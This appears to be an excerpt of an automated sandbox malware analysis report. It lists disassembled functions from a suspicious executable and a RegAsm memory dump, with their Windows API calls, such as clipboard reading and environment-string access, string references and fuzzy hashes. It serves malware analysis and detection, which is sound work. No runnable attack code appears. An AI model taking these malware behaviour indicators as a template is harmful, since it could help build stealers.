Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4

Function 004108A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8

Function 0041C43D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C445

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD

Function 004241E7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A

Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0

___initconout.LIBCMT ref: 0042421A

Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99

Function 004102AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041033D

Strings

pow, xrefs: 00410315, 00410332

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: ba283ab10e86f0ff01337ebee0106e11519cd21400a500e12903ed81b54b832b
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: CD517EB1A4A6068BCB117714DA413EB37A09B40701F604D6BE8D5413E9EB7D8CF69A4F

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::failbit set, xrefs: 00401E62
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
Opcode Fuzzy Hash: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A430 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A523

Strings

csm, xrefs: 0040A50D

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A

Function 0040AD3D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD62

Strings

RCC, xrefs: 0040AD7C
MOC, xrefs: 0040AD74

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95

Function 00407EA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
___raise_securityfailure.LIBCMT ref: 00407F6B

Strings

@SC, xrefs: 00407F66

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9

Function 00405ABE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405AC5

Strings

pdB, xrefs: 00405B01
A]@, xrefs: 00405AEB

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: A]@$pdB
API String ID: 431132790-1964063989
Opcode ID: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction ID: 9708e6e5fcb6faf266b2e239077eb0a834cba51f5faa1665736d4655e106cb5a
Opcode Fuzzy Hash: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
Instruction Fuzzy Hash: AE01D6B4A00615CFC761DF68C580A5ABBF0FF08344B51896EE489DB751D7B5AA40CF98

Analysis Process: qKLAD7yUjj.exePID: 5600, Parent PID: 1712COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	8

Executed Functions

Function 00EBD2C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 00EBD2D1
GetCurrentThreadId.KERNEL32 ref: 00EBD2E6
GetCurrentProcessId.KERNEL32 ref: 00EBD2EC
ExitProcess.KERNEL32 ref: 00EBD4B0

Strings

'GFA, xrefs: 00EBD3C3, 00EBD3CB
edgf, xrefs: 00EBD44E

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 'GFA$edgf
API String ID: 1029096631-957644222
Opcode ID: 45c5c23126ae7e4ba7fb52036ca6ebf396d2252831db497a069a124e571cd742
Instruction ID: f59c209f71d9bee06a8700c1b675b4dc0e42aef317161d6cfff2e9044adbc89d
Opcode Fuzzy Hash: 45c5c23126ae7e4ba7fb52036ca6ebf396d2252831db497a069a124e571cd742
Instruction Fuzzy Hash: 0541697440D2809BC301BF28D944A6EFBE5EF52709F18AD1CE1C4A7262E73AD850CB67

Function 00EF7560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00EF4FF1,00000001,00000005,?,00000000,?,?,00ED14D5), ref: 00EF758E

Strings

7654, xrefs: 00EF7564
7654, xrefs: 00EF7582

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654$7654
API String ID: 2994545307-1888865020
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00EF4200 Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00EF4257

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9968c55321636e139e56dd253f7dbd1eee683775de6c4d55efbbdfdaa40e30e3
Instruction ID: f2419e22c5a19265f8cff09c66c239d4f7bb2f49b03830790ee22f32140f503a
Opcode Fuzzy Hash: 9968c55321636e139e56dd253f7dbd1eee683775de6c4d55efbbdfdaa40e30e3
Instruction Fuzzy Hash: 38F03A7410C244AFD705FB58E941A1EFBE5EB55701F44882CF5C497262C235E824DB63

Function 00EF6F80 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNELBASE(00EBD4AE), ref: 00EF6F8B

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 877202408e75cf8aa1609e2dbc48084d15e6446fe1adb30e26f4a3b7423a30a8
Instruction ID: 2e1d1b88016bede9f5a30e1441bf347d03e7914c7143e398382040fcc2e8bbf6
Opcode Fuzzy Hash: 877202408e75cf8aa1609e2dbc48084d15e6446fe1adb30e26f4a3b7423a30a8
Instruction Fuzzy Hash: CFA0023081414DDBDE457B21EE095193A62B74470A310A094BF59A1036CE217430FA25

Non-executed Functions

Function 00EE9000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00EE9010
GetWindowLongW.USER32 ref: 00EE9035
GetClipboardData.USER32 ref: 00EE9045
GlobalLock.KERNEL32 ref: 00EE9068
GlobalUnlock.KERNEL32 ref: 00EE914A
CloseClipboard.USER32 ref: 00EE9155

Strings

?, xrefs: 00EE90BD
e, xrefs: 00EE90D1
3, xrefs: 00EE9090

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 3$?$e
API String ID: 2832541153-3975470078
Opcode ID: efa143f1eb6e17d2ed7f4d284932e0e37df07a8e63f4ad72eeda8cf10766a593
Instruction ID: 68548f3fa6fb64867a73284ded885a6caf2dc2e81fe640c1d2914cb0ef7746a7
Opcode Fuzzy Hash: efa143f1eb6e17d2ed7f4d284932e0e37df07a8e63f4ad72eeda8cf10766a593
Instruction Fuzzy Hash: 34417C7000C7C28ED311EF3D948876EBFE0AB92324F154A6DE4EA96292C7758549C7A3

Function 00EF004B Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 420COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 00EEFED4
VariantInit.OLEAUT32(?), ref: 00EF0071
VariantClear.OLEAUT32(?), ref: 00EF0130
SysFreeString.OLEAUT32(?), ref: 00EF0155
SysFreeString.OLEAUT32(?), ref: 00EF0162
SysFreeString.OLEAUT32(?), ref: 00EF0179

Strings

7654, xrefs: 00EF048D
4`[b, xrefs: 00EF0430

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: String$Free$Variant$ClearInit
String ID: 4`[b$7654
API String ID: 4205145696-3675246634
Opcode ID: ca13f4365a3e5855d471e782ddb04ac62db19622a277fffaa15460d50ee89886
Instruction ID: 944a85c0044615835dde7fb801bc27e1e75d778560c210b7fb33ef81cd6ccc82
Opcode Fuzzy Hash: ca13f4365a3e5855d471e782ddb04ac62db19622a277fffaa15460d50ee89886
Instruction Fuzzy Hash: 31E1DCB5A08209DFDB00DF68EC81BAEBBB1FB89305F144828E685E7291D735E905DB51

Function 00EEFD0E Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 403memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00EEFD6C
SysAllocString.OLEAUT32 ref: 00EEFE2C

Strings

7654, xrefs: 00EF048D
4`[b, xrefs: 00EF0430
,/, xrefs: 00EEFDD9

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: AllocString
String ID: ,/$4`[b$7654
API String ID: 2525500382-138038313
Opcode ID: c5cf7ec7939a7aa5877241a8fd9f2070f3a2e00aa89555c31aa2326548e6114c
Instruction ID: b3f8dd201e3e9557bffeb1a06ed1c5e7b03557d9aad8910b451218763327dab7
Opcode Fuzzy Hash: c5cf7ec7939a7aa5877241a8fd9f2070f3a2e00aa89555c31aa2326548e6114c
Instruction Fuzzy Hash: 88E1CFB5A08349EFDB109F68DC81B6EBBB1FB89305F14482CF685A7291D735D910CB62

Function 00EE81AA Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

P, xrefs: 00EE822C

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-1343716551
Opcode ID: c5e1547b7f4b3dbcc3c7432435c6cb330687a23bc4a0bc2288e3acd97ccbcf6d
Instruction ID: 97d2d45703c96fc8b32681eb25ec9fc0dd96440ef56157b183cce4ed1a73705a
Opcode Fuzzy Hash: c5e1547b7f4b3dbcc3c7432435c6cb330687a23bc4a0bc2288e3acd97ccbcf6d
Instruction Fuzzy Hash: C121A5F0904B40AFD360EF3AC90675BBEE8EB49350F104A1DF8AA87791D371A4458BD6

Function 00EE71AB Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 89COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EE71C3
VariantInit.OLEAUT32 ref: 00EE71CF

Strings

?, xrefs: 00EE7227
4, xrefs: 00EE7217
H, xrefs: 00EE723F
0, xrefs: 00EE71FF
2, xrefs: 00EE71F7
#, xrefs: 00EE7207
9, xrefs: 00EE71EF
V, xrefs: 00EE721F
(, xrefs: 00EE724F
-, xrefs: 00EE7247
!, xrefs: 00EE722F
e, xrefs: 00EE7263
8, xrefs: 00EE720F
?, xrefs: 00EE7237
7, xrefs: 00EE7257

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
API String ID: 2610073882-164105402
Opcode ID: 22a8f1c66469840082745c944c2aa0fd83b1475a1beabed724104313cf0ba7db
Instruction ID: 7cf1fa2cb2b5c4cc62ddfcbda49dd9a3b62f5da9bb917bcbea2d88fd7d09fe72
Opcode Fuzzy Hash: 22a8f1c66469840082745c944c2aa0fd83b1475a1beabed724104313cf0ba7db
Instruction Fuzzy Hash: 814109600087C18EC726CF298488216BFA16F16224F488ADDD8E54F7DBC375E519CBA2

Function 00EE5993 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 81COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EE599D
VariantInit.OLEAUT32 ref: 00EE59A9

Strings

?, xrefs: 00EE5A01
(, xrefs: 00EE5A29
-, xrefs: 00EE5A21
?, xrefs: 00EE5A11
2, xrefs: 00EE59D1
V, xrefs: 00EE59F9
4, xrefs: 00EE59F1
9, xrefs: 00EE59C9
0, xrefs: 00EE59D9
e, xrefs: 00EE5A3D
7, xrefs: 00EE5A31
H, xrefs: 00EE5A19
!, xrefs: 00EE5A09
#, xrefs: 00EE59E1
8, xrefs: 00EE59E9

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
API String ID: 2610073882-164105402
Opcode ID: 039d2b2dfe9c3e5f2f8675ce5e94112336f599acd0fb9780746b486f700134ab
Instruction ID: 95400d1d1d4e850761b801bbbe8b065f72cfa6e0a49880321e91a76c52fed4be
Opcode Fuzzy Hash: 039d2b2dfe9c3e5f2f8675ce5e94112336f599acd0fb9780746b486f700134ab
Instruction Fuzzy Hash: 8041E7600087C1CED726DF2D8488616BFA06F26224F488ADDD8E54F3DBC375E519CBA2

Function 00EE6BEE Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EE6BF4
VariantInit.OLEAUT32 ref: 00EE6C03

Strings

c, xrefs: 00EE6C6F
e, xrefs: 00EE6C77
q, xrefs: 00EE6C27
g, xrefs: 00EE6C7F
}, xrefs: 00EE6C57
w, xrefs: 00EE6C3F
u, xrefs: 00EE6C37
a, xrefs: 00EE6C67
f, xrefs: 00EE6C83
s, xrefs: 00EE6C2F
i, xrefs: 00EE6C87
2, xrefs: 00EE6C43
{, xrefs: 00EE6C4F
y, xrefs: 00EE6C47

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
